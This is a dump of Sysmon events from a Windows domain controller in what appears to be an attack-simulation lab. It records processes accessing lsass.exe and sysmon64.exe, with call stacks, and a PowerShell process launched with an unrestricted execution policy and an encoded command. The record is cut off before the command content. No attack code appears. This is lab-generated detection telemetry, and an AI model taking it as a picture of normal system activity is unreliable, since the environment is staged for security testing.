Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3DD2-5F80-EE26-110000000000}0x1126ee0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3C68-5F80-0C00-000000007E01}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.155{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.155{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.155{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.077{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.077{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.077{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.061{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.061{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.061{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3DD3-5F80-F802-000000007E01}47604960C:\Windows\system32\conhost.exe{733EE690-3DD3-5F80-FC02-000000007E01}2736C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.843{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.827{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD3-5F80-FC02-000000007E01}2736C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.827{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.827{733EE690-3DD3-5F80-FB02-000000007E01}27522112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD3-5F80-FC02-000000007E01}2736C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68ee32b2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6838413c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68383e0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68e35472(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683449a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683a2e72(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683864d7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683864d7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68386368(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683782ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68384820(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68384413(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6838413c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68383e0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68e35472(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6836ac6e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6836a23e(wow64) 154100x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.842{733EE690-3DD3-5F80-FC02-000000007E01}2736C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD3-5F80-F456-110000000000}0x1156f40HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 